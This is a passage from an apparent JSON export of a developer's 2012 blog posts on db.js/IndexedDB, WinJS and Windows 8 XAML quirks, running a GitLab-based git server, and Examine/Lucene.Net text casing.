and I really like the Promise API.\nFor db.js I decided that everything would be handled through Promises to keep consistencies with the various callbacks that would be happening. Another decision was that I wouldn’t take a dependency on any existing library that provides a Promise API (like jQuery) to keep db.js as agnostic as possible. So I implemented my own Promise API, as per the CommonJS specification that would power db.js (the Promise spec is pretty easy to implement really).\nOpening a connectionThere’s a few things that you need to do when opening a server connection, you need to:\nProvide the name of the server Provide a schema version If the schema version is newer then you have to handle a schema change Listen of a success or fail method and react accordingly Rather than through a series of properties or arguments that you set I went with an object literal, so creating a connection is like so:\nvar promise = db.open({ server: 'my-app', version: 1, schema: { people: { } } }); This opens a connection to the database server my-app on the current domain and the version of that server is 1, which uses the provided schema, which has a single store (aka, table) called people. If you want more object stores then just add another property to the schema object, each named property becomes an object store name.\nThis returns a Promise object which is implemented as per the CommonJS spec so you have to listen for the success handler to move on:\npromise.done(function (server) { window.server = server; }); It can get a bit tricky there, you don’t have an active server connection until the done function is called. The argument it is provided is a db.js Server object which maintains the active connection. Make sure you expose that out otherwise your server connection will be lost!\nNote: Since opening the connection is an asynchronous operation you need to make sure any code that will use the server is told to wait for it. The connection generally opens quickly but when you can use it isn’t known. This is something that can easily trip you up.\nPersisting the connection What you’ll notice from the above code is that it is making the server a global object in my application. The expectation of db.js is that you only ever have one Server object, if you descope it you loose your access to the connection, but this does not close the connection. IndexedDB only allows one connection per server to be open at any given time, so keep that in mind in your application.\nThat said db.js will try and be smart about connection management, it caches the connections internally so if you try and re-open a connection it will return you the existing one.\nClosing the connection Since our connection is a singleton there may be times you don’t need it hanging around, to do this you need to close it off:\nserver.close(); Be aware though that the connection may not close immediately, IndexedDB has steps it must follow to close a connection. Once the connection is closed the Server instance that db.js provided you with will raise an error any time you try and work against it.\nAccessing a storeNow that you have a connection db.js will be smart about what stores you have available. What it does is go through all the stores on your connection and create them as properties of the server, allowing quick access to them. Let’s see how that works by adding some data.\nAdding data IndexedDB has a really nice feature when it comes to adding data (well doing any operation really), it has transaction support! The problem is that because of this everything takes lot more code to do. With db.js this is seemlessly handled for you and when you’re doing bulk inserts it’ll even take care of that:\nvar promise = server.people .add({ firstName: 'Aaron', lastName: 'Powell' }, { firstName: 'John', lastName: 'Smith' }); Here you’ll notice we’re accessing the people property on our server, this tells db.js which of our object stores we want to work against. Next you pass in one or more items that represent the objects you want to store and then the method returns a Promise. To know when you have added all records use a done handler:\npromise.done(function (records, server) { console.log(records); }); The done method will be provided with the records after they go into IndexedDB, this means that if you’re using an auto-incrementing key it’ll have been added to the record so you can then access it.\nNote: I’ll cover off how to set up a key on an object store in a future post.\nPromise progress method If you’ve read the Promise spec you’ll notice that it includes a reference to a progress method. This is used to keep the application “in the loop” when an asynchronous job is running. When you are using the add method in db.js it will trigger the progress method for each record that is inserted. This is because there are two levels of asynchronous jobs happening in the add process, you have the overall transaction status and the individual record status. I see the main use for this is when you are doing a large insert into IndexedDB (say the first time the user comes to the application) and you want them to know not to hit refresh.\nRemoving data Removing records is just as simple as adding them:\nserver.people .remove(1) .done(function (key) { console.log('removed record with key `1`'); }); You need to provide the key of the record you wish to remove and it’ll go off and do it.\nNote: Currently db.js doesn’t support bulk removal.\nAccessing a record You’ve got a record into your store, how about getting it back out again?\nserver.people .get(1) .done(function (person) { console.log('The person with the primary key `1` is... ', person); }); The get method takes a single key and returns the record that matches it. Essentially it’s a pass through to the native get metohd of IndexedDB.\nAccessing multiple records If you want to get back multiple records db.js has a very extensive query API which supports all of the IndexedDB query methods, as well as adding some additional sugar on top. Here’s a basic “get all” operation:\nserver.people .query() .all() .execute() .done(function (people) { console.log(people); }); There’s a few steps you need to go through, first all the querying is done via the query API. From here we use the all method which is exposed, it tells IndexedDB to get back each record in an unfiltered manner. Once we’re done setting up our query we call the execute method which tells db.js to take the rules we’ve specified and pass them through to IndexedDB. Ultimately a Promise is returned and we can listen for the resulting data.\nThe reason for the execute method is because there’s a lot more we can do from the query. Through this we have a nice fluent chaining API that we can structure our query before it is run. In my next post we’ll look at how to do more powerful querying with db.js.\nConclusionThis has been a very quick overview of db.js and the approach I’ve taken to simplify working with IndexedDB.\n", "id": "2012-10-01-hello-dbjs" }, { "title": "Teched 2012 - HTML & JavaScript Windows 8 apps", "url": "https://www.aaron-powell.com/posts/2012-09-26-teched-2012/", "date": "Wed, 26 Sep 2012 00:00:00 +0000", "tags": [ "auteched", "winjs", "speaking" ], "description": "", "content": "Couldn’t make it to Teched Australia this year?\nMade it and absolutely loved my session?\nWell good news everybody, it’s now online for your viewing pleasure, check it out here.\nThis year my session was looking at doing Windows 8 applications using HTML and JavaScript. Through the session I looked at things that I learnt while building my application, things that you need to watch out for and stuff that just plain sucks.\nHopefully it helps you avoid grief in your on WinJS applications.\n", "id": "2012-09-26-teched-2012" }, { "title": "How to check if a file exists in Windows 8", "url": "https://www.aaron-powell.com/posts/2012-09-24-check-if-file-exists/", "date": "Mon, 24 Sep 2012 00:00:00 +0000", "tags": [ "windows8", "winjs", "c#", "winrt" ], "description": "Ever wondered how to check if a file exists in Windows 8?", "content": "Sometimes things are simple, sometimes they aren’t when you think they should be. One such thing in Windows 8 development is checking if a file exists…\nIn a Windows 8 app (be it C# or JavaScript) you work with the StorageFolder. Since we are sandboxed and don’t really have file-system access we don’t have the System.IO namespace as we’re use to meaning we have an entirely new set of APIs for reading a writing files (although it’s nice that they are built around being asynchronous). The fun thing about StorageFolder is it has no method like FileExistsAsync. Yep, there’s no API which will allow you to work out whether a file exists or not…\nSo how do you do it?\nEDD, Exception Driven DevelopmentIf you’ve done much Windows 8 development you’ll have learnt that a lot of the methods you’d expect to return null values or have a TryGetFoo method will actually raise an exception when the take can’t be completed. StorageFolder is no exception to this rule.\nAlthough I can’t find it documented anywhere it seems that the only way you can check if a file exists if with this:\nStorageFile file; try { file = await ApplicationData.Current.LocalStorage.GetFileAsync("foo.txt"); } catch (FileNotFoundException) { file = null; } It seems to consistently throw the FileNotFoundException when it doesn’t exist (which I guess makes sense :P), but the problem is that you end up with this try/ catch block where you’re essentially swallow an exception (and everything in my programming past tells me that that’s a bad idea).\nWell the logic is pretty straight forward so here’s an extension method:\npublic static class StorageFolderExtensions { public static async Task<bool> FileExistsAsync(this StorageFolder folder, string fileName) { try { await folder.GetFileAsync(fileName); return true; } catch (FileNotFoundException) { return false; } } } Or grab the gist.\nWinJS file existsSo that above is all well and good in C#/ XAML Windows 8 applications, but what if you’re like me and would prefer to just use WinJS?\nWell the API is slightly less shit for WinJS, true you still don’t have any easy way to check if a file exists or not but instead of being exception based it handles it through promises:\nvar folder = Windows.Storage.ApplicationData.current.roamingFolder; folder.getFileAsync('foo.txt').then(function (file) { //process with a valid file }, function (e) { //no file was found }); While this is somewhat nicer as you don’t have to try/ catch the error it’s still not ideal. One of the main problems here is there’s no way to know what error was raised. Since JavaScript doesn’t have typed error handling like C# any error that comes from the getFileAsync method goes into the same error handler. This can be a bit of a pain although I’m struggling to find any documentation on what else could be raised.\nThere’s three things you can do in this case:\nAssume that it is the WinJS equivilent of FileNotFoundException and treat all errors the same (this is probably the best way, you don’t have a file, do you really care why?) You can check the message contains something stating the file didn’t exist, but if you do this make sure you’re taking localisation into account! Cast it to it’s base error type and go from there. This isn’t overly robust as the best you can do is e instanceof WinRTError as it’s not of type FileNotFoundException If you’re really keen here’s an extension method for doing it in WinJS in a very basic manner (and gist):\nWindows.Storage.StorageFolder.prototype.fileExistsAsync = function(fileName) { var folder = this; return WinJS.Promise(function (complete, error) { folder.getFileAsync(fileName).then(function() { complete(); }, function() { error(); }); }); }; But realistically I wouldn’t bother, since WinJS uses a Promise for this you can pretty easily split out the logic branch between the found/ not found process without the need for an ugly try/ catch block in place. Hell if you don’t want to do anything when there isn’t a file then you can drop the error callback all together and the application will carry on its merry way.\nConclusionThere’s no built in method for determining if a file exists or not from a Windows 8 application using the StorageFolder API. If you’re using C# you’re going to need to handle the FileNotFoundException and go from there. A simple extension method is easy to create if you’re doing a lot of file IO and want to check files exist. WinJS is marginally better though the different async handling but really it’s just hiding the try/ catch away behind another layer. In this case you can provide different callbacks for the different states which can make the code a little cleaner.\n", "id": "2012-09-24-check-if-file-exists" }, { "title": "Running a simple git server on Windows", "url": "https://www.aaron-powell.com/posts/2012-09-21-a-simple-git-server-on-windows/", "date": "Fri, 21 Sep 2012 00:00:00 +0000", "tags": [ "git" ], "description": "How to setup a basic git server for Windows", "content": "While Mercurial still hold a special place in my heart it can’t be denied that Git has well and truly won the war. Because of this I’ve been using it more extensively in the projects that I work on.\nRecently I started on an engagement at work that was using TFS as its SCM, but wanting to avoid some of the pain of TFS 2010 I decided to use git-tf. Things all went smoothly, git was communicating nicely to TFS and children danced around the world.\nWhen the partner who owned the TFS instance rolled off the project the SCM went with them which left me in a pickle, I still had a few weeks left and was looking at the prospect of being SCM-less. For various security reasons I can’t utilise any of the normal hosted SCM’s that I’d go with, so I was left with a problem, I have a complete git history of the project but the only place it lived was on my desktop.\nMaking my own serverHaving used Mercurial for around 3 years now I’m quite familiar with the hg serve command, this is ideal as you run that and you immediately have a basic Mercurial server running that you can push and pull to. This is exactly what I want for git, I’d have a simple server that I can work against and so can the other developer who was coming in few a few days. Unfortunately there is no such command, you do instead have the git daemon, and with a simple command like this:\ngit daemon --reuseaddr --base-path=. --export-all --verbose You’ve got yourself a git server. Yeah go on, remember that off the top of your head (yes you just type it once in as an alias I know I know :P)!\nSo I run my command, have my server ready for connections and then shit gets ugly.\nAs it turns out msysgit, the de-facto Windows git tools, has some real problems with git daemon. I was continuously seeing this while trying to clone:\nfatal: read error: Invalid argument Eventually a clone would go through (it’s only a 10mb repo!) but then you’d get a whole different set of problems.\nAgain, as it turns out msysgit doesn’t support pushing to git:// repositories on Windows. Well that just sucks then doesn’t it, it left us with sneakerneting our .git folder so I could maintain the master repository.\nAnd that got old fast!\nNext up, cygwinSo now that msysgit was out the next idea was to use cygwin. I’ve been avoiding installing cygwin on any machines for quite some time now as it really frustrates the hell out of me but I got sent this stack overflow post which made it seem quite easy to get it up and running.\nWell I followed the instructions and started up my sever and it all seemed good, I could pull from it without any problems. Yay!\nBut of course it was time for another problem, I kept having git push hang at 100% of writing objects.\nAgain this seems to be a fairly common problem with git on Windows pushing to cygwin git daemons and to which there’s no decent solution.\nDitching WindowsBasically all my research has suggested to me that the idea of trying to host a git server on Windows is just a bad idea. Sure there were other avenues that I hadn’t tried, such as using a network share to store my git repository and push/ pulling over that, but I didn’t want to futz around with network security here for this task (people also suggested using Dropbox but that is nullified by the fact that the source can’t be hosted outside of the local network), I just wanted a damn git server and my only remaining option that I could see was Linux.\nSince my machine is running Windows 8 I’ve got Hyper-V built in so that’s one problem down, I didn’t have to install VirtualBox (its installer wants me to trust Oracle, I just can’t do that :P) or VMWare Player or anything like that, just enable a Windows feature. The next question, what distro to use…\nWow, there’s a can of worms you can open, ask people what Linux distro to use… I’ll admit that it’s been quite a few years since I last used Linux so I’m not really up with what the kids are using these days but all I want are:\nSomething light-weight, I’m running a Git server on it, that’s all Something easy to setup, I don’t have time (or the desire) to really get in and configure Linux I don’t need a GUI, I’m happy on the command line So ArchLinux and PuppyLinux were two of the top recommended distros, but they’d require a bit of setup to get running. Then a colleague of mine recommended GitLab, a variation of Turnkey that is basically just a pre-built git server. Sweet that sounds exactly like what I want.\nI downloaded GitLab, booted Hyper-V, attached the ISO and kicked off the installer. After being prompted for some credentials to log in and having to use the Legacy Network Adapter in Hyper-V (apparently Turnkey supports the standard one but 5 minutes of configuring modules didn’t work for me so I went ‘meh, legacy it is’ :P) my git server was up and running!\nFor the record my VM specs are a 5GB hard drive and it has 512mb RAM dedicated to it. I was tempted to drop it down to 256mb as it really just idles mostly but I’ve got RAM to spare.\nNext step was to log into the web portal, setup a git project on the server and add my public key and it just worked. Seriously, I was shocked that it was that simple!\nI even managed to get the other developer (who prefers GUI tools over command line, weirdo!) setup to use GitHub for Windows against my GitLab server.\nConclusionWant to run a git server on Windows? Don’t bother, install GitLab, it takes about 10 minutes to be up and running with that in a VM.\nThe more I’ve been using GitLab the more I’m liking it, it’s got a nifty little web UI, we can see the repository information, all that fun stuff that distracts you from actually doing work.\n", "id": "2012-09-21-a-simple-git-server-on-windows" }, { "title": "Creating classes in WinJS", "url": "https://www.aaron-powell.com/posts/2012-09-14-creating-classes/", "date": "Fri, 14 Sep 2012 00:00:00 +0000", "tags": [ "winjs", "windows8", "javascript" ], "description": "A look at how you can create JavaScript classes in WinJS", "content": "Sure using classes in JavaScript may not be a great idea, you can’t help but argue that there are valid scenarios which you would be wanting to use the class pattern.\nIf you’re doing WinJS development there’s an API that will allow you to make classes easily, WinJS.Class being the root. From here you can define new classes, derive classes or create mixins.\nCreating a classIt’s very easy to create a class using the WinJS API, here’s a simple person:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }); var me = new Person('Aaron', 'Powell'); console.log(me.firstName + ' ' me.lastName); Not very exciting is it?\nWell let’s say you want to add some instance members:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }, { sayHello: function () { console.log('Hello there good sir'); } }); var me = new Person('Aaron', 'Powell'); me.sayHello(); The 2nd argument to the define method is a JavaScript object that represents the public instance members which you will have available on your class. There’s also a third argument you can use which allows you to create public static members.\nPowerful properties Something that I found rather cool and not particularly well documented is how the properties are created (both the instance and static properties). Internally they are created using the Object.defineProperties method, and since this is ECMAScript 5 we’re able to do some cool things, such as leveraging the new property features, like so:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }, { fullName: { get: function () { return this.firstName + ' ' + this.lastName; } } }); What I’ve done here is used a property descriptor to create a read only property which calculates a value based off of other properties on the object. WinJS takes this information and then creates it properly so I can do:\nconsole.log(me.fullName); If I then try and set the value of fullName nothing will happen, it gets ignored.\nYou can also leverage this to create properties with validation in them:\nvar Person = WinJS.Class.define(function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }, { fullName: { get: function () { return this.firstName + ' ' + this.lastName; } }, age: { get: function () { return this._age; }, set: function (value) { if (value < 0) { throw 'Age must be greater than or equal to 0'; } this._age = value; } }, _age: 0 }); Now I have a more intelligent property in age, it will do validation to make sure that you don’t have a negative age and it stores its information in a pseudo-private property, that being _age.\nPseudo-private property? Huh? Since JavaScript doesn’t really have the notion of classes the concept of public/ private members doesn’t exist. You can have things internal to the “constructor” function, but they can’t be accessed outside of that scope. Instead what WinJS does (and many other class pattern libraries) is uses the _ prefix to denote something as private. While this wont actually be private, it’s a bit harder to learn about (Visual Studio intellisense drops any JavaScript members that start with it for example).\nThe other thing that WinJS does to help you hide these members is it will look to see if you’ve provided a property descriptor, and then look for the enumerable property of it (if you don’t have a property descriptor it creates one and sets enumerable to false). When the enumerable property on a descriptor is false (the default too BTW) the property will be skipped when the properties are enumerated by say a for-in loop or Object.keys.\nSo these _-prefixed members are hidden as best as they can be in JavaScript, and it’s really neat that you can use a common coding convention to mark them as hidden rather than having to create a full descriptor yourself.\nDeriving classesSometimes just creating a class isn’t enough, you want to have a base class which you can then derive others from. Again since there’s no class system in JavaScript this isn’t native, but through the use of prototypes you can simulate this inheritance. WinJS provides a simple to use API for doing classical inheritance, WinJS.Class.derive.\nLet’s use the tacky person-employee example for this:\nvar Employee = WinJS.Class.derive(Person, function (firstName, lastName, position) { this.firstName = firstName; this.lastName = lastName; this.position = position; }); For this as you can probably tell you provide the first argument of the method as the base class and then all arguments beyond that are the same as if you’re calling define.\nSide note - if you don’t provide a base class it will pipe the arguments through to the define function anyway.\nSince this inherits from the Person class I have access to all its members so I can call sayHello for example, or set the age of the employee.\nA gotcha with derived classes While working with the derive API I hit a problem, the base class constructor was never called! I had a base class that I defined like this:\nvar Bootstrapper = WinJS.Class.define(function () { var initialised = false; this.init = function () { //do some init stuff //eventually call customInit }; }, { customInit: function () {} }); So this was the bootstrapper for my application but I wanted it so I could create an extended version of it for the different parts so I could bootstrap each individually. I then extended it like so:\nvar MainBootstrapper = WinJS.Class.derive(MyApp.Bootstrapper, function () { }, { customInit: function () { //do some custom stuff } }); new MainBootstrapper().init(); But this crashes, it crashes because init was not found on my MainBootstrapper. Strange, my type inherits from Bootstrapper, if I create an instance of Bootstrapper I get that, so why don’t I have the init method on my derived type?\nWell here’s the problem the “base constructor” is never called. This means that anything done in the constructor of the type you’re inheriting from doesn’t get executed, and since that’s where I was defining my init method it never got added to the object! The reason for this is that the derive method only does prototypal inheritance, it doesn’t do constructor inheritance.\nThe easiest way to get around this is to move what you’re setting up in your constructor into being setup in the instance members like the earlier Person example. If this isn’t possible you can solve it in another way by manually calling the base class constructor function yourself, like so:\nvar MainBootstrapper = WinJS.Class.derive(MyApp.Bootstrapper, function () { MyApp.Bootstrapper.apply(this);\t}, { customInit: function () { //do some custom stuff } }); new MainBootstrapper().init(); Here you’ll notice I’m using the apply method to invoke the MyApp.Bootstrapper function. By doing that and passing this into it we’re setting the scope of the function to be the instance of the MainBootstrapper being created, which in turn will perform any logic against it and properly extend the MainBootstrapper object with the base class constructor logic.\nThis is a frustrating problem, it took me ages to work out why my inheritance wasn’t working the way I was expecting it to so watch out if you’re doing classical inheritance in WinJS and wanting constructor inheritance.\nMixinsThe WinJS.Class.mix function is an interesting one and not something that you’ll likely have come across before. What it does is allow you to implement multiple inheritance in JavaScript (and if you’re a .NETter this wont exactly be familiar :P).\nLet’s revisit our Employee example:\nvar payable = { accountNumber: 0, bsb: 0, accountName: '', rate: 150 }; var worker = { expectedHours: 8, worksWeekends: false }; var Employee = WinJS.Class.mix(Person, payable, worker); Here instead of using the derive function I’ve used mix to create our Employee. This time I’ve got a few objects that represent various things that could make up my employee type and I use mix to ultimately put them all together. The first argument is the constructor function which you want to use, so my Person class goes there and then it’s essentially a param[] argument, everything that’s used after the constructor has its properties copied onto the object, building up the members of it. Again this has the same property creation logic as define so you can make pseudo-privates, you can add get/ set bodies, etc.\nConclusionSo this wraps up our look at the WinJS.Class API. I’m not trying to convince you that you should use classes in your JavaScript code but instead have a look a the API for it if/ when you reach the point that you think classes can have benefits inside of your WinJS application.\nI also wanted to document some of the more intelligent features about how you can create classes, that it’s smart enough to look for, and use, the ECMAScript 5 properties as well as taking conventions into account for creating privates. I also wanted to raise the problem that you can hit with the way classical inheritance is implemented in WinJS.\n", "id": "2012-09-14-creating-classes" }, { "title": "The settings suck", "url": "https://www.aaron-powell.com/posts/2012-09-14-settings-suck/", "date": "Fri, 14 Sep 2012 00:00:00 +0000", "tags": [ "xaml", "windows8", "rant" ], "description": "Settings in Windows 8 XAML suck. Period.", "content": "Settings problemsMy first Windows 8 application I wrote using WinJS so a lot of my expectations on how settings worked in Windows 8 XAML was based off of that experience. Unfortunately from the looks of it the two teams had very different ideas on whether settings were important or not and thus we have drastically different experiences.\nHere’s the problems I’ve hit so far:\nSetting up settings, if you do this “too early” (ie - before the app has fired off its Activated event) it crashes as the settings pane doesn’t exist There’s no built-in settings control Since there’s no control there’s no way to navigate to a particular settings pane You use an event handler to register settings panes With the exception of the last point (which sucks in both platforms) these are problems specific to XAML based Windows 8 applications. What absolutely baffles me is that there’s no settings stuff built into the platform, seriously, did no one think that that would be important? I mean it’s not like you need to have a section in settings about privacy or anything.\nProblem 1 - No built in controlSo let’s start with the big one, the lack of built in control. It’s reasonably trivial to roll you’re own, as long as you take into account the following things:\nRTL vs LTR displays will open the settings on different sites, make sure you know which side the system settings are opening from and make your settings come from that site as well You’ll want it to animate in, check out the settings on the start screen, they have a nice little fly in so you’ll want to replicate that yourself You’ll want a back button so your user can easily flick back to the overall settings pane Make sure it’s in the allowed widths, either 346 or 646 in width If you want to look into creating it there’s a blog here or the official sample that covers all the steps you’ll be wanting to go through.\nBut realistically don’t roll your own, check out the Callisto. It has a built in settings flyout that works very similar to the one in WinJS which is ace. Maybe the next version will just roll that into the platform.\nProblem 2 - Wiring up settingsSay you want to have a global settings pane, maybe your privacy policy, well you’re going to want to register this in the “global” part of the application. My initial instinct was to do this in the App.xaml.cs constructor. Seemed logical, it was something that I knew would only be executed once and well you’re only registering an event handler through a static so that seemed good enough.\nBut no, no it’s not. The problem is (and it’s not clear to me from the documentation) that SettingsPane.GetForCurrentView() if you don’t have a view (ie - you’re in the App constructor) then it will through a very unhelpful exception. Now sure, this may be me making a mistaken assumption on when you can register settings as in WinJS that’s when you do it (well technically not in a constructor since there’s no constructor really but you do it bright and early)!\nWhen to register So once you learn that you need to do it later the question is when? Well it turns out that this is where you need to be paying attention to the event model of Windows 8 applications, in particular the Activated event. This event is the first point that I’ve been able to find you can register settings panes (or at least access the current view to setup the event handler).\nIdeally you also want to check the ActivationKind so you only register when your application first launches and not other times to avoid duplicate registration.\nNon-global settings Sometimes you might want settings which are not always there. Say you’ve got some context-specific help that you want the users to be able to access, there’d be no point having that available from every screen as it might introduce confusion about what the context is.\nWell it turns out you can unregister settings panes by simply removing the event handler, so if you’ve got this:\nSettingsPane.GetForCurrentView().CommandRequested += OnCommandRequested If you then remove that event handler:\nSettingsPane.GetForCurrentView().CommandRequested -= OnCommandRequested Any settings created there are automatically removed.\nThe ideal way to use this would be inside your OnNavigatedTo and OnNavigatedFrom methods (which come from the Page base class) you add/ remove the event handlers.\nProblem 3 - NavigationSince there’s no built-in control and no real settings concept in the platform you can’t “go to” a settings pane. Coming from WinJS I found SettingsFlyout.showSettings really quite useful, but since there’s no comparative API in XAML you’re pretty much stuffed.\nSo far the best answer I’ve got from anyone on how to do this is to make your settings flyout (the one from Callisto) a “global” variable so you can change the IsOpen property of it to programmatically show it.\nNow that just plain sucks.\nConclusionYes this was mostly a rant. As I keep saying the settings in Windows 8 XAML sucks. There’s some very pointy edges, particularly when you are comparing the experience to the WinJS experience.\nMy tips are:\nUse Callisto, it’s got a great control for doing settings (and many other good controls)\nKnow when and where you need to wire up your event handlers, ideally the Activated event but you can scope them to a particular page\nTry to avoid a UX which requires the users to be forced into the settings, have it discoverable and intuitive for them\n", "id": "2012-09-14-settings-suck" }, { "title": "Text casing and Examine", "url": "https://www.aaron-powell.com/posts/2012-09-05-text-casing-and-examine/", "date": "Wed, 05 Sep 2012 00:00:00 +0000", "tags": [ "lucene.net", "examine", "umbraco" ], "description": "", "content": "A few times I’ve seen questions posted on the Umbraco forums which ask how to deal with case insensitivity text with Examine, and it’s also something that we’ve had to handle a few times within our own company.\nHere’s a scenario:\nYou have a site search You use examine You want to show the results looking exactly the same as it was before it went into Examine If you’re running a standard install you’ll notice that the content always ends up lowercased!\nThis is a bit of a problem, page titles will be lowercase, body content will be lowercase, etc. Part of this will be due to a mistake in Examine, part of it is due to the design of Lucene.\nIn this article I’ll have a look at what you need to do to make it work as you’d expect.\nFirst, some background Before we dive directly into what to do to fix it you really should understand what is happening. If you don’t care feel free to skip over this bit though :P.\nSearching is a tricky thing, and when searching the statement Examine == examine == false; To get around this searching is best done in a case insensitive manner. To make this work Examine did a forced lowercase of the content before it was pushed into Lucene.Net. This was to ensure that everything was exactly the same when it was searched against. In hindsight this is not really a great idea, it really should be the responsibility of the Lucene Analyzer to handle this for you.\nMany of the common Lucene.Net analyzers actually do automatic lowercasing of content, these analysers are:\nStandardAnalyzer StopAnalyzer SimpleAnalyzer So if you’re using the standard Examine config you’ll find yourself using the StandardAnalyzer and still have your content lowercased.\nThis means that there’s no need to Lucene to concern itself about case sensitivity when searching, everything is parsed by the analyzer (field terms and queries) and you’ll get more matches.\nSo how do I get around this? Now that we’ve seen why all your content is generally lower case, how can we work with it in the original format and display it back to the UI?\nWell we need some way in which we can have the field data stored without the analyzer screwing around with it.\nNote: This doesn’t need to be done if you’re using an analyzer which doesn’t have a LowerCaseTokenizer or LowercaseFilter. If you’re using a different analyzer, like KeywordAnalyzer then this post wont cover what you’re after (since the KeywordAnalyzer isn’t lowercasing, you’re actually using an out-dated version of Examine, I recommend you grab the latest release :)). More information on Analyzers can be found at https://www.aaron-powell.com/lucene-analyzer\nLuckily we’ve got some hooks into Examine to allow us to do what we need here, it’s in the form of an event on the Examine.LuceneEngine.Providers.LuceneIndexer, called DocumentWriting. Note that this event is on the LuceneIndexer, not the BaseIndexProvider. This event is Lucene.Net specific and not logical on the base class which is agnostic of any other framework.\nWhat we can do with this event is interact directly with Lucene.Net while Examine is working with it. You’ll need to have a bit of an understanding of how to work with a Lucene.Net Document (and for that I’d recommend having a read of this article from me: https://www.aaron-powell.com/documents-in-lucene-net), cuz what you’re able to do is play with Lucene.Net… Feel the power!\nSo we can attach the event handler the same way as you would do any other event in Umbraco, using an Action Handler:\npublic class UmbracoEvents : ApplicationBase { public UmbracoEvents() { var indexer = (LuceneIndexer)ExamineManager.Instance.IndexProviderCollection["DefaultIndexer"]; indexer.DocumentWriting +=new System.EventHandler(indexer_DocumentWriting); } } To do this we’ve got to cast the indexer so we’ve got the Lucene version to work with, then we’re attaching to our event handler. Let’s have a look at the event handler\nvoid indexer_DocumentWriting(object sender, DocumentWritingEventArgs e) { //grab out lucene document from the event arguments var doc = e.Document; //the e.Fields dictionary is all the fields which are about to be inserted into Lucene.Net //we'll grab out the "bodyContent" one, if there is one to be indexed if(e.Fields.ContainsKey("bodyContent")) { string content = e.Fields["bodyContent"]; //Give the field a name which you'll be able to easily remember //also, we're telling Lucene to just put this data in, nothing more doc.Add(new Field("__bodyContent", content, Field.Store.YES, Field.Index.NOT_ANALYZED)); } } And that’s how you can push data in. I’d recommend that you do a conditional check to ensure that the property you’re looking for does exist in the Fields property of the event args, unless you’re 100% sure that it appears on all the objects which you’re indexing.\nLastly we need to display that on the UI, well it’s easy, rather accessing the bodyContent property of the SearchResults, use the __bodyContent and you’ll get your unanalyzed version.\nConclusion Here we’ve looked at how we can use the Examine events to interact with the Lucene.Net Document. We’ve decided that we want to push in unanalyzed text, but you could use this idea to really tweak your Lucene.Net document. But really playing with the Document is not recommended unless you really know what you’re doing ;).\n", "id": "2012-09-05-text-casing-and-examine" }, { "title": "Forcing Windows 8 soft keyboard to hide", "url": "https://www.aaron-powell.com/posts/2012-08-31-forcing-windows-8-keyboard-to-hide/", "date": "Fri, 31 Aug 2012 00:00:00 +0000", "tags": [ "xaml" ], "description": "Hack of the day goes to how you hide the soft keyboard on a Windows 8 application", "content": "We had a bug raised that when the user presses enter on the sign in screen the login process begins but the soft keyboard (the on-screen keyboard) doesn’t get dismissed so the user gets the impression they can keep interacting with it. Through some Monkey Testing this produced a bug where the application would crash because it would fire off multiple requests to log in as they could keep hitting enter and eventually crashing the application.\nThe logical solution is to hide the soft keyboard.\nBut here’s a question, how would you hide the keyboard in Windows 8 XAML?\nThought #1 - remove focusI’m a web guy so when I want to defocus an element I use blur, so that’s my first point of call.\nBut of course there’s no Blur method on XAML elements. Strike that off the list.\nThought #2 - change focusMy research lead me to Focus as a method on controls which takes a FocusState enum value, one of the properties being Unfocused. Bingo!\nBut every time I set it the app would crash with an AccessViolationException (or something to that effect). Great, that’s no help now is it! Moving on…\nThought #3 - FocusManagerFine well apparently WPF has a FocusManager that you can also use to change focus. This is also available in Windows 8 XAML, but do you think that’d have the SetFocusedElement on it?\nNo, that’d be too simple! Guess we can strike this one down too\nOne hack to rule them allSince you don’t have access to the soft keyboard programmatically and every attempt made to change focus was either throwing exceptions or simply missing anything useful it was time to think outside the box.\nIt was time for a hack!\nA funny thing about input controls in Windows 8 XAML is if they are not enabled, ie - read-only, the soft keyboard wont display for them. Well that makes sense doesn’t it and hey, they were bound to get something right eventually!\nThis gave me an idea, let’s make the textbox read-only. The only problem is this has to be done as early as possible, even before we validate, to prevent undesired keyboard mashing. This also means that our validation wont be done so there’s a chance that we’ll have a failure in sign in and need to make the fields writeable again.\nSo all we did was add this to our event handler:\nusername.IsEnabled = password.IsEnabled = false; username.IsEnabled = password.IsEnabled = true; Yes, one line after the other like that and you hide your soft keyboard. facepalm\nTL;DRWant to hide your soft keyboard in Windows 8 XAML?\n", "id": "2012-08-31-forcing-windows-8-keyboard-to-hide" }, { "title": "WebView, oh you!", "url": "https://www.aaron-powell.com/posts/2012-08-28-webview-oh-you/", "date": "Tue, 28 Aug 2012 00:00:00 +0000", "tags": [ "xaml", "facepalm" ], "description": "Oh that WebView control is a funny one", "content": "Today can only be summarized by this:\nWhile I’m having my fun in the dark side of development doing XAML I hit something really whacky today, using the WebView control.\nHere be dragonsThe WebView control seems to be a little bit special, and not really special in a good way and it seems others have also found it limiting.\nBut I hit an interesting problem with the WebView control rendering, in particular rendering it in a settings panel. Long story short it didn’t display.\nHere’s the XAML:\n<UserControl> <Grid> <WebView Source="https://www.aaron-powell.com" /> </Grid> </UserControl> (I omitted the namespace guff for you)\nSure I might not be a XAML wiz but I’m pretty sure that that should work, and according to the limited knowledge of how layout works this would be fine right? My WebView doesn’t have sizes specified so it should fill out to the whole area.\nWell you’re wrong. It would seem that when you use a WebView control that doesn’t have a size set on it, nor on its parents it just goes 0x0.\nThis coupled with the WebView’s inability to animate with the rest of the controls in its container makes leaves me just bemused.\nConclusionAvoid the WebView control. Avoid it at all costs.\n", "id": "2012-08-28-webview-oh-you" }, { "title": "XAML by a web guy", "url": "https://www.aaron-powell.com/posts/2012-08-20-xaml-by-a-web-guy/", "date": "Mon, 20 Aug 2012 00:00:00 +0000", "tags": [ "xaml" ], "description": "So I'm starting to learn XAML...", "content": "A few weeks ago a new project came up at work which I moved onto, a project which is XAML based. More specifically Windows 8 XAML and having built a Windows 8 app using HTML and JavaScript I was keen to give it a crack.\nNow I’m very much a web guy. If you read my blog you’ll know that I spend more time blogging about JavaScript than anything else. But in an effort to be a better developer I thought it was worthwhile diving into the other kind of angled brackets and give this thing ago and I want to share some thoughts of mine having spent two weeks doing XAML development (for the record this isn’t the first time I’ve looked at XAML, I looked at it back in about early 2010, did some playing with XAML 1.0, I even own a book on it, but I never got 